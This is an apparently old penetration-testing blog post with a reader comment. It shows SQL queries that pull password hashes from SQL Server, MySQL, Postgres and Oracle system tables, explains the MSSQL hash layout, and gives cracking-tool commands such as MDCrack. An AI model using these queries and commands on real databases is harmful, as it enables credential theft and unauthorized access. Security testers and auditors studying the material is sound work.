Database Password Hashes Cracking
SQL Server 2000:-
SELECT password from master.dbo.sysxlogins where name='sa'
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0×0100- constant header
34767D5C- salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
crack the upper case hash in 'cain and abel' and then work the case sentive hash
SQL server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0×0100- constant header
993BF231-salt
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.
update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+——————–+
| PASSWORD('mypass') |
+——————–+
| 6f8c114b58f2ce9e |
+——————–+
*mysql >=4.1
mysql> SELECT PASSWORD('mypass');
+——————————————-+
| PASSWORD('mypass') |
+——————————————-+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+——————————————-+
Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'
Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql")
select usename, passwd from pg_shadow;
usename | passwd
——————+————————————-
testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, i am a bit bored….
References/Copied from:-
http://hkashfi.blogspot.com/2007/08/breaking-sql-server-2005-hashes.html
http://dev.mysql.com/doc/refman/5.0/en/password-hashing.html
http://pentestmonkey.net/blog/cracking-postgres-hashes/
http://freeworld.thc.org/thc-orakelcrackert11g/
Hi Sumit,
first of all congratulations for your blog!
Just some notes about this post:
On Microsoft SQL Server 2000 such query does not always return the hashes in the password field, even with their own Query Analyzer it returns NULL, depending on the Service Pack of the SQL Server itself (tested on SP0), you’ve to use a cast algorithm to do such, I implemented it on sqlmap, you can find the source code at http://sqlmap.sourceforge.net/dev/plugins.mssqlserver-pysrc.html#MSSQLServerMap.getPasswordHashes if you’re interested in further details.
Cain and Abel does the work properly cracking MSSQL password hashes, but I suggest you to give a try also to http://www.ngssoftware.com/products/database-security/ngs-sqlcrack.php, if you do not know it already. The algorithm implemented uses native DLL functions to speed up the process of cracking.
Cheers,
Comment by Bernardo :: April 16, 2008 @ 8:00 amBernardo